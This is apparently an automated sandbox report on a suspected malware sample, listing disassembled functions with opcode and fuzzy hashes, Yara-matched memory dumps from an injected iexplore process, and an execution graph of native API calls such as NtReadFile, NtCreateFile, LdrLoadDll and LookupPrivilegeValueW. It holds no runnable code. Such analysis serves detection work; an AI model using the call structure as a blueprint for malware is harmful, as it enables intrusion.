                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 422a4f0e02dd1d16c195ef4f5690a55b3946f6375e62b1b0196fe9edcbf39a93
                                  • Instruction ID: ffe6b740b822ad47a95a84a2c9915a392ce37a66cbd37731a67c6b1f5acd60a9
                                  • Opcode Fuzzy Hash: 422a4f0e02dd1d16c195ef4f5690a55b3946f6375e62b1b0196fe9edcbf39a93
                                  • Instruction Fuzzy Hash: 1AE0CD1360C2A217C30F66B8755D1F66B10DF45339B5845B7C5485D0BF5A1555D7C2C4
                                  Function 00007FFD9B8B37F0 Relevance: .0, Instructions: 3COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b681d5fba718c48d921107642b7d94c5f76d837e2fe1170f13fe3e7f7d18f05
                                  • Instruction ID: 7876ea6d5aea4ef0e99e07759ff7820ade6c89092f9fb7c5bebadf8437c0f696
                                  • Opcode Fuzzy Hash: 1b681d5fba718c48d921107642b7d94c5f76d837e2fe1170f13fe3e7f7d18f05
                                  • Instruction Fuzzy Hash: FA9002415091A741930A257875155D55B005A0122861845A6D05949087594410559245
                                  Function 00007FFD9B8B2888 Relevance: .0, Instructions: 1COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 882766b3571aaaf62c1b2cab992a6353931edb3bd4ebdd7c8b2a8bf81787594d
                                  • Instruction ID: 5bb43517937486736ab7fb81e33199aa7ee03f1ae9fb4c04e5c98e33cb87d09a
                                  • Opcode Fuzzy Hash: 882766b3571aaaf62c1b2cab992a6353931edb3bd4ebdd7c8b2a8bf81787594d
                                  • Instruction Fuzzy Hash:

                                  Non-executed Functions

                                  Function 00007FFD9B8B2608 Relevance: 3.3, Strings: 2, Instructions: 826COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 5I_L$6I_H
                                  • API String ID: 0-3256093555
                                  • Opcode ID: 0a94980efd675a8876e0bf8c3a00c13e7275b984d50c4326a58c9c5b7f1dfa5b
                                  • Instruction ID: cb68c72545b103f53b51d850dc6595323f914e0e1cbfe12117318196b75f858b
                                  • Opcode Fuzzy Hash: 0a94980efd675a8876e0bf8c3a00c13e7275b984d50c4326a58c9c5b7f1dfa5b
                                  • Instruction Fuzzy Hash: FC223531B0DA4A4FE768DB5CE8516B577D1EB99320F1543BFD48AC32A6DE25B8428380
                                  Function 00007FFD9B8B88FA Relevance: 7.6, Strings: 6, Instructions: 103COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: K_^J$K_^T$K_^^$K_^_$K_^`$K_^i
                                  • API String ID: 0-1392725123
                                  • Opcode ID: 3e8d39f3582a6f85fb1a551881bef944d13fd05a5cb3024442da05e87f68d410
                                  • Instruction ID: b393092cf0a4b8ea1442365f69c3cf1793e6040fcd18bac3aba177c0406af710
                                  • Opcode Fuzzy Hash: 3e8d39f3582a6f85fb1a551881bef944d13fd05a5cb3024442da05e87f68d410
                                  • Instruction Fuzzy Hash: 3521467370C2295FDB227BADBC954C97BA0EF9437930902F3C298CB087E914648782C1
                                  Function 00007FFD9B8B2E25 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1914704441.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_#U0426#U0438#U0442#U0430#U0442#U0430.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: L_^$L_^$L_^$L_^7
                                  • API String ID: 0-92517651
                                  • Opcode ID: 5460e68d6bd405811a4141ad8c9a9470e7d1edaaacb10100250bf711a8aa2744
                                  • Instruction ID: fbfda1e980ddd0492f6f078f23cfe20b45f1463ad467169ec8477c7cf6e36c87
                                  • Opcode Fuzzy Hash: 5460e68d6bd405811a4141ad8c9a9470e7d1edaaacb10100250bf711a8aa2744
                                  • Instruction Fuzzy Hash: 61411C97B0A17645E7267BFDBC668EC3B40EF4227A70842B3C1DD890D7ED09644B81D5

                                  Execution Graph

                                  Execution Coverage:1.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:5.4%
                                  Total number of Nodes:516
                                  Total number of Limit Nodes:59
                                  execution_graph 85081 41f080 85084 41b960 85081->85084 85085 41b986 85084->85085 85092 409d30 85085->85092 85087 41b9b3 85088 41b992 85088->85087 85100 40c1b0 85088->85100 85090 41b9a5 85136 41a6a0 85090->85136 85140 409c80 85092->85140 85094 409d3d 85095 409d44 85094->85095 85152 409c20 85094->85152 85095->85088 85101 40c1d5 85100->85101 85553 40b1b0 85101->85553 85103 40c22c 85557 40ae30 85103->85557 85105 40c252 85135 40c4a3 85105->85135 85566 414390 85105->85566 85107 40c297 85107->85135 85569 408a60 85107->85569 85109 40c2db 85109->85135 85576 41a4f0 85109->85576 85113 40c331 85114 40c338 85113->85114 85588 41a000 85113->85588 85115 41bdb0 2 API calls 85114->85115 85117 40c345 85115->85117 85117->85090 85119 40c382 85120 41bdb0 2 API calls 85119->85120 85121 40c389 85120->85121 85121->85090 85122 40c392 85123 40f490 3 API calls 85122->85123 85124 40c406 85123->85124 85124->85114 85125 40c411 85124->85125 85126 41bdb0 2 API calls 85125->85126 85127 40c435 85126->85127 85593 41a050 85127->85593 85130 41a000 2 API calls 85131 40c470 85130->85131 85131->85135 85598 419e10 85131->85598 85134 41a6a0 2 API calls 85134->85135 85135->85090 85137 41a6b2 85136->85137 85138 41af50 LdrLoadDll 85137->85138 85139 41a6bf ExitProcess 85138->85139 85172 418bb0 85140->85172 85144 409c9c 85145 409ca6 85144->85145 85179 41b2a0 85144->85179 85145->85094 85147 409ce3 85147->85145 85190 409aa0 85147->85190 85149 409d03 85196 409620 LdrLoadDll 85149->85196 85151 409d15 85151->85094 85153 409c23 85152->85153 85527 41b590 85153->85527 85156 41b590 LdrLoadDll 85157 409c4b 85156->85157 85158 41b590 LdrLoadDll 85157->85158 85159 409c61 85158->85159 85160 40f170 85159->85160 85161 40f189 85160->85161 85536 40b030 85161->85536 85163 40f19c 85540 41a1d0 85163->85540 85166 409d55 85166->85088 85168 40f1c2 85169 40f1ed 85168->85169 85546 41a250 85168->85546 85171 41a480 2 API calls 85169->85171 85171->85166 85173 418bbf 85172->85173 85197 414e40 85173->85197 85175 409c93 85176 418a60 85175->85176 85203 41a5f0 85176->85203 85180 41b2b9 85179->85180 85210 414a40 85180->85210 85182 41b2d1 85183 41b2da 85182->85183 85249 41b0e0 85182->85249 85183->85147 85185 41b2ee 85185->85183 85267 419ef0 85185->85267 85507 407ea0 85190->85507 85192 409ac1 85192->85149 85193 409aba 85193->85192 85520 408160 LdrLoadDll LdrInitializeThunk 85193->85520 85195 409b66 85195->85149 85196->85151 85198 414e5a 85197->85198 85200 414e4e 85197->85200 85198->85175 85200->85198 85202 4152c0 LdrLoadDll 85200->85202 85201 414fac 85201->85175 85202->85201 85204 418a75 85203->85204 85206 41af50 85203->85206 85204->85144 85207 41af60 85206->85207 85209 41af82 85206->85209 85208 414e40 LdrLoadDll 85207->85208 85208->85209 85209->85204 85211 414d75 85210->85211 85213 414a54 85210->85213 85211->85182 85213->85211 85273 419c40 85213->85273 85215 414b80 85276 41a350 85215->85276 85216 414b63 85333 41a450 LdrLoadDll 85216->85333 85219 414b6d 85219->85182 85220 414ba7 85221 41bdb0 2 API calls 85220->85221 85223 414bb3 85221->85223 85222 414d39 85225 41a480 2 API calls 85222->85225 85223->85219 85223->85222 85224 414d4f 85223->85224 85229 414c42 85223->85229 85342 414780 LdrLoadDll NtReadFile NtClose 85224->85342 85226 414d40 85225->85226 85226->85182 85228 414d62 85228->85182 85230 414ca9 85229->85230 85232 414c51 85229->85232 85230->85222 85231 414cbc 85230->85231 85335 41a2d0 85231->85335 85234 414c56 85232->85234 85235 414c6a 85232->85235 85334 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 85234->85334 85238 414c6f 85235->85238 85242 414c87 85235->85242 85279 4146e0 85238->85279 85240 414c60 85240->85182 85242->85226 85291 414400 85242->85291 85243 414d1c 85339 41a480 85243->85339 85244 414c7d 85244->85182 85247 414c9f 85247->85182 85248 414d28 85248->85182 85251 41b0f1 85249->85251 85250 41b103 85250->85185 85251->85250 85360 41bd30 85251->85360 85253 41b124 85254 414060 3 API calls 85253->85254 85256 41b147 85253->85256 85254->85256 85255 41b170 85255->85185 85256->85255 85363 414060 85256->85363 85258 41b169 85258->85255 85388 415380 85258->85388 85260 41b1fa 85261 41b20a 85260->85261 85482 41aef0 LdrLoadDll 85260->85482 85398 41ad60 85261->85398 85264 41b238 85477 419eb0 85264->85477 85268 41af50 LdrLoadDll 85267->85268 85269 419f0c 85268->85269 85270 41bdb0 85269->85270 85504 41a660 85270->85504 85272 41b349 85272->85147 85274 41af50 LdrLoadDll 85273->85274 85275 414b34 85274->85275 85275->85215 85275->85216 85275->85219 85277 41af50 LdrLoadDll 85276->85277 85278 41a36c NtCreateFile 85277->85278 85278->85220 85280 4146fc 85279->85280 85281 41a2d0 LdrLoadDll 85280->85281 85282 41471d 85281->85282 85283 414724 85282->85283 85284 414738 85282->85284 85285 41a480 2 API calls 85283->85285 85286 41a480 2 API calls 85284->85286 85287 41472d 85285->85287 85288 414741 85286->85288 85287->85244 85343 41bfc0 LdrLoadDll RtlAllocateHeap 85288->85343 85290 41474c 85290->85244 85292 41444b 85291->85292 85293 41447e 85291->85293 85294 41a2d0 LdrLoadDll 85292->85294 85295 4145c9 85293->85295 85299 41449a 85293->85299 85296 414466 85294->85296 85297 41a2d0 LdrLoadDll 85295->85297 85298 41a480 2 API calls 85296->85298 85303 4145e4 85297->85303 85300 41446f 85298->85300 85301 41a2d0 LdrLoadDll 85299->85301 85300->85247 85302 4144b5 85301->85302 85305 4144d1 85302->85305 85306 4144bc 85302->85306 85356 41a310 LdrLoadDll 85303->85356 85307 4144d6 85305->85307 85311 4144ec 85305->85311 85309 41a480 2 API calls 85306->85309 85310 41a480 2 API calls 85307->85310 85308 41461e 85312 41a480 2 API calls 85308->85312 85313 4144c5 85309->85313 85314 4144df 85310->85314 85319 4144f1 85311->85319 85344 41bf80 85311->85344 85315 414629 85312->85315 85313->85247 85314->85247 85315->85247 85318 414557 85320 41456e 85318->85320 85355 41a290 LdrLoadDll 85318->85355 85326 414503 85319->85326 85347 41a400 85319->85347 85322 414575 85320->85322 85323 41458a 85320->85323 85324 41a480 2 API calls 85322->85324 85325 41a480 2 API calls 85323->85325 85324->85326 85327 414593 85325->85327 85326->85247 85328 4145bf 85327->85328 85350 41bb80 85327->85350 85328->85247 85330 4145aa 85331 41bdb0 2 API calls 85330->85331 85332 4145b3 85331->85332 85332->85247 85333->85219 85334->85240 85336 414d04 85335->85336 85337 41af50 LdrLoadDll 85335->85337 85338 41a310 LdrLoadDll 85336->85338 85337->85336 85338->85243 85340 41a49c NtClose 85339->85340 85341 41af50 LdrLoadDll 85339->85341 85340->85248 85341->85340 85342->85228 85343->85290 85346 41bf98 85344->85346 85357 41a620 85344->85357 85346->85319 85348 41af50 LdrLoadDll 85347->85348 85349 41a41c NtReadFile 85348->85349 85349->85318 85351 41bba4 85350->85351 85352 41bb8d 85350->85352 85351->85330 85352->85351 85353 41bf80 2 API calls 85352->85353 85354 41bbbb 85353->85354 85354->85330 85355->85320 85356->85308 85358 41af50 LdrLoadDll 85357->85358 85359 41a63c RtlAllocateHeap 85358->85359 85359->85346 85483 41a530 85360->85483 85364 414071 85363->85364 85365 414079 85363->85365 85364->85258 85387 41434c 85365->85387 85486 41cf20 LdrLoadDll RtlAllocateHeap 85365->85486 85367 4140cd 85487 41cf20 LdrLoadDll RtlAllocateHeap 85367->85487 85369 4140d8 85370 414126 85369->85370 85488 41cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 85369->85488 85489 41cf20 LdrLoadDll RtlAllocateHeap 85370->85489 85374 41413a 85490 41cf20 LdrLoadDll RtlAllocateHeap 85374->85490 85376 4141ad 85491 41cf20 LdrLoadDll RtlAllocateHeap 85376->85491 85378 414324 85493 41cf80 LdrLoadDll RtlFreeHeap 85378->85493 85380 41432e 85494 41cf80 LdrLoadDll RtlFreeHeap 85380->85494 85382 414338 85495 41cf80 LdrLoadDll RtlFreeHeap 85382->85495 85384 4141f5 85492 41cf80 LdrLoadDll RtlFreeHeap 85384->85492 85385 414342 85496 41cf80 LdrLoadDll RtlFreeHeap 85385->85496 85387->85258 85389 415391 85388->85389 85390 414a40 8 API calls 85389->85390 85392 4153a7 85390->85392 85391 4153fa 85391->85260 85392->85391 85393 4153e2 85392->85393 85394 4153f5 85392->85394 85395 41bdb0 2 API calls 85393->85395 85396 41bdb0 2 API calls 85394->85396 85397 4153e7 85395->85397 85396->85391 85397->85260 85497 41ac20 85398->85497 85401 41ac20 LdrLoadDll 85402 41ad7d 85401->85402 85403 41ac20 LdrLoadDll 85402->85403 85404 41ad86 85403->85404 85405 41ac20 LdrLoadDll 85404->85405 85406 41ad8f 85405->85406 85407 41ac20 LdrLoadDll 85406->85407 85408 41ad98 85407->85408 85409 41ac20 LdrLoadDll 85408->85409 85410 41ada1 85409->85410 85411 41ac20 LdrLoadDll 85410->85411 85412 41adad 85411->85412 85413 41ac20 LdrLoadDll 85412->85413 85414 41adb6 85413->85414 85415 41ac20 LdrLoadDll 85414->85415 85416 41adbf 85415->85416 85417 41ac20 LdrLoadDll 85416->85417 85418 41adc8 85417->85418 85419 41ac20 LdrLoadDll 85418->85419 85420 41add1 85419->85420 85421 41ac20 LdrLoadDll 85420->85421 85422 41adda 85421->85422 85423 41ac20 LdrLoadDll 85422->85423 85424 41ade6 85423->85424 85425 41ac20 LdrLoadDll 85424->85425 85426 41adef 85425->85426 85427 41ac20 LdrLoadDll 85426->85427 85428 41adf8 85427->85428 85429 41ac20 LdrLoadDll 85428->85429 85430 41ae01 85429->85430 85431 41ac20 LdrLoadDll 85430->85431 85432 41ae0a 85431->85432 85433 41ac20 LdrLoadDll 85432->85433 85434 41ae13 85433->85434 85435 41ac20 LdrLoadDll 85434->85435 85436 41ae1f 85435->85436 85437 41ac20 LdrLoadDll 85436->85437 85438 41ae28 85437->85438 85439 41ac20 LdrLoadDll 85438->85439 85440 41ae31 85439->85440 85441 41ac20 LdrLoadDll 85440->85441 85442 41ae3a 85441->85442 85443 41ac20 LdrLoadDll 85442->85443 85444 41ae43 85443->85444 85445 41ac20 LdrLoadDll 85444->85445 85446 41ae4c 85445->85446 85447 41ac20 LdrLoadDll 85446->85447 85448 41ae58 85447->85448 85449 41ac20 LdrLoadDll 85448->85449 85450 41ae61 85449->85450 85451 41ac20 LdrLoadDll 85450->85451 85452 41ae6a 85451->85452 85453 41ac20 LdrLoadDll 85452->85453 85454 41ae73 85453->85454 85455 41ac20 LdrLoadDll 85454->85455 85456 41ae7c 85455->85456 85457 41ac20 LdrLoadDll 85456->85457 85458 41ae85 85457->85458 85459 41ac20 LdrLoadDll 85458->85459 85460 41ae91 85459->85460 85461 41ac20 LdrLoadDll 85460->85461 85462 41ae9a 85461->85462 85463 41ac20 LdrLoadDll 85462->85463 85464 41aea3 85463->85464 85465 41ac20 LdrLoadDll 85464->85465 85466 41aeac 85465->85466 85467 41ac20 LdrLoadDll 85466->85467 85468 41aeb5 85467->85468 85469 41ac20 LdrLoadDll 85468->85469 85470 41aebe 85469->85470 85471 41ac20 LdrLoadDll 85470->85471 85472 41aeca 85471->85472 85473 41ac20 LdrLoadDll 85472->85473 85474 41aed3 85473->85474 85475 41ac20 LdrLoadDll 85474->85475 85476 41aedc 85475->85476 85476->85264 85478 41af50 LdrLoadDll 85477->85478 85479 419ecc 85478->85479 85503 36f2df0 LdrInitializeThunk 85479->85503 85480 419ee3 85480->85185 85482->85261 85484 41a54c 85483->85484 85485 41af50 LdrLoadDll 85483->85485 85484->85253 85485->85484 85486->85367 85487->85369 85488->85369 85489->85374 85490->85376 85491->85384 85492->85378 85493->85380 85494->85382 85495->85385 85496->85387 85498 41ac3b 85497->85498 85499 414e40 LdrLoadDll 85498->85499 85500 41ac5b 85499->85500 85501 414e40 LdrLoadDll 85500->85501 85502 41ad07 85500->85502 85501->85502 85502->85401 85503->85480 85505 41a67c RtlFreeHeap 85504->85505 85506 41af50 LdrLoadDll 85504->85506 85505->85272 85506->85505 85508 407eb0 85507->85508 85509 407eab 85507->85509 85510 41bd30 LdrLoadDll 85508->85510 85509->85193 85511 407ed5 85510->85511 85512 407f38 85511->85512 85513 419eb0 2 API calls 85511->85513 85514 407f3e 85511->85514 85518 41bd30 LdrLoadDll 85511->85518 85521 41a5b0 85511->85521 85512->85193 85513->85511 85516 407f64 85514->85516 85517 41a5b0 2 API calls 85514->85517 85516->85193 85519 407f55 85517->85519 85518->85511 85519->85193 85520->85195 85522 41a5cc 85521->85522 85523 41af50 LdrLoadDll 85521->85523 85526 36f2c70 LdrInitializeThunk 85522->85526 85523->85522 85524 41a5e3 85524->85511 85526->85524 85528 41b5b3 85527->85528 85531 40ace0 85528->85531 85530 409c3a 85530->85156 85533 40ad04 85531->85533 85532 40ad0b 85532->85530 85533->85532 85534 40ad40 LdrLoadDll 85533->85534 85535 40ad57 85533->85535 85534->85535 85535->85530 85537 40b053 85536->85537 85539 40b0d0 85537->85539 85551 419c80 LdrLoadDll 85537->85551 85539->85163 85541 41af50 LdrLoadDll 85540->85541 85542 40f1ab 85541->85542 85542->85166 85543 41a7c0 85542->85543 85544 41af50 LdrLoadDll 85543->85544 85545 41a7df LookupPrivilegeValueW 85544->85545 85545->85168 85547 41a26c 85546->85547 85548 41af50 LdrLoadDll 85546->85548 85552 36f2ea0 LdrInitializeThunk 85547->85552 85548->85547 85549 41a28b 85549->85169 85551->85539 85552->85549 85554 40b1b9 85553->85554 85555 40b030 LdrLoadDll 85554->85555 85556 40b1f4 85555->85556 85556->85103 85558 40ae3d 85557->85558 85559 40ae41 85557->85559 85558->85105 85560 40ae5a 85559->85560 85561 40ae8c 85559->85561 85603 419cc0 LdrLoadDll 85560->85603 85604 419cc0 LdrLoadDll 85561->85604 85563 40ae9d 85563->85105 85565 40ae7c 85565->85105 85567 4143b6 85566->85567 85568 40f490 3 API calls 85566->85568 85567->85107 85568->85567 85570 408a79 85569->85570 85605 4087a0 85569->85605 85572 4087a0 15 API calls 85570->85572 85575 408a9d 85570->85575 85573 408a8a 85572->85573 85573->85575 85623 40f700 9 API calls 85573->85623 85575->85109 85577 41af50 LdrLoadDll 85576->85577 85578 41a50c 85577->85578 85713 36f2e80 LdrInitializeThunk 85578->85713 85579 40c312 85581 40f490 85579->85581 85582 40f4ad 85581->85582 85714 419fb0 85582->85714 85585 40f4f5 85585->85113 85586 41a000 2 API calls 85587 40f51e 85586->85587 85587->85113 85589 41af50 LdrLoadDll 85588->85589 85590 41a01c 85589->85590 85720 36f2d10 LdrInitializeThunk 85590->85720 85591 40c375 85591->85119 85591->85122 85594 41af50 LdrLoadDll 85593->85594 85595 41a06c 85594->85595 85721 36f2d30 LdrInitializeThunk 85595->85721 85596 40c449 85596->85130 85599 41af50 LdrLoadDll 85598->85599 85600 419e2c 85599->85600 85722 36f2fb0 LdrInitializeThunk 85600->85722 85601 40c49c 85601->85134 85603->85565 85604->85563 85606 407ea0 3 API calls 85605->85606 85621 4087ba 85605->85621 85606->85621 85607 408a49 85607->85570 85608 408a3f 85660 408160 LdrLoadDll LdrInitializeThunk 85608->85660 85612 419ef0 LdrLoadDll 85612->85621 85614 41a480 LdrLoadDll NtClose 85614->85621 85617 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 85617->85621 85620 419e10 2 API calls 85620->85621 85621->85607 85621->85608 85621->85612 85621->85614 85621->85617 85621->85620 85624 419d00 85621->85624 85627 4085d0 85621->85627 85639 40f5e0 LdrLoadDll NtClose 85621->85639 85640 419d80 LdrLoadDll 85621->85640 85641 419db0 LdrLoadDll 85621->85641 85642 419e40 LdrLoadDll 85621->85642 85643 4083a0 85621->85643 85659 405f60 LdrLoadDll 85621->85659 85623->85575 85625 41af50 LdrLoadDll 85624->85625 85626 419d1c 85625->85626 85626->85621 85628 4085e6 85627->85628 85661 419870 85628->85661 85630 408771 85630->85621 85631 4085ff 85631->85630 85682 4081a0 85631->85682 85633 4086e5 85633->85630 85634 4083a0 11 API calls 85633->85634 85635 408713 85634->85635 85635->85630 85636 419ef0 LdrLoadDll 85635->85636 85637 408748 85636->85637 85637->85630 85638 41a4f0 2 API calls 85637->85638 85638->85630 85639->85621 85640->85621 85641->85621 85642->85621 85644 4083c9 85643->85644 85691 408310 85644->85691 85647 41a4f0 2 API calls 85648 4083dc 85647->85648 85648->85647 85649 408467 85648->85649 85650 408462 85648->85650 85699 40f660 85648->85699 85649->85621 85651 41a480 2 API calls 85650->85651 85652 40849a 85651->85652 85652->85649 85653 419d00 LdrLoadDll 85652->85653 85654 4084ff 85653->85654 85654->85649 85703 419d40 85654->85703 85656 408563 85656->85649 85657 414a40 8 API calls 85656->85657 85658 4085b8 85657->85658 85658->85621 85659->85621 85660->85607 85662 41bf80 2 API calls 85661->85662 85663 419887 85662->85663 85689 409310 LdrLoadDll NtClose 85663->85689 85665 4198a2 85666 4198e0 85665->85666 85667 4198c9 85665->85667 85670 41bd30 LdrLoadDll 85666->85670 85668 41bdb0 2 API calls 85667->85668 85669 4198d6 85668->85669 85669->85631 85671 41991a 85670->85671 85672 41bd30 LdrLoadDll 85671->85672 85673 419933 85672->85673 85679 419bd4 85673->85679 85690 41bd70 LdrLoadDll 85673->85690 85675 419bb9 85676 419bc0 85675->85676 85675->85679 85677 41bdb0 2 API calls 85676->85677 85678 419bca 85677->85678 85678->85631 85680 41bdb0 2 API calls 85679->85680 85681 419c29 85680->85681 85681->85631 85683 40829f 85682->85683 85684 4081b5 85682->85684 85683->85633 85684->85683 85685 414a40 8 API calls 85684->85685 85686 408222 85685->85686 85687 41bdb0 2 API calls 85686->85687 85688 408249 85686->85688 85687->85688 85688->85633 85689->85665 85690->85675 85692 408328 85691->85692 85693 40ace0 LdrLoadDll 85692->85693 85694 408343 85693->85694 85695 414e40 LdrLoadDll 85694->85695 85696 408353 85695->85696 85697 40835c PostThreadMessageW 85696->85697 85698 408370 85696->85698 85697->85698 85698->85648 85700 40f673 85699->85700 85706 419e80 85700->85706 85704 41af50 LdrLoadDll 85703->85704 85705 419d5c 85704->85705 85705->85656 85707 419e8c 85706->85707 85708 41af50 LdrLoadDll 85707->85708 85709 419e9c 85708->85709 85712 36f2dd0 LdrInitializeThunk 85709->85712 85710 40f69e 85710->85648 85712->85710 85713->85579 85715 419fcc 85714->85715 85716 41af50 LdrLoadDll 85714->85716 85719 36f2f30 LdrInitializeThunk 85715->85719 85716->85715 85717 40f4ee 85717->85585 85717->85586 85719->85717 85720->85591 85721->85596 85722->85601 85725 36f2ad0 LdrInitializeThunk

                                  Executed Functions

                                  Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 41a400-41a449 call 41af50 NtReadFile
                                  APIs
                                  • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: !JA$bMA$bMA
                                  • API String ID: 2738559852-4222312340
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                  Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 151 40ace0-40acfc 152 40ad04-40ad09 151->152 153 40acff call 41cc40 151->153 154 40ad0b-40ad0e 152->154 155 40ad0f-40ad1d call 41d060 152->155 153->152 158 40ad2d-40ad3e call 41b490 155->158 159 40ad1f-40ad2a call 41d2e0 155->159 164 40ad40-40ad54 LdrLoadDll 158->164 165 40ad57-40ad5a 158->165 159->158 164->165
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                                  Function 0041A350 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 166 41a350-41a3a1 call 41af50 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                  • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                  Function 0041A47C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 184 41a47c-41a4a9 call 41af50 NtClose
                                  APIs
                                  • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1817657781.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_iexplore.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
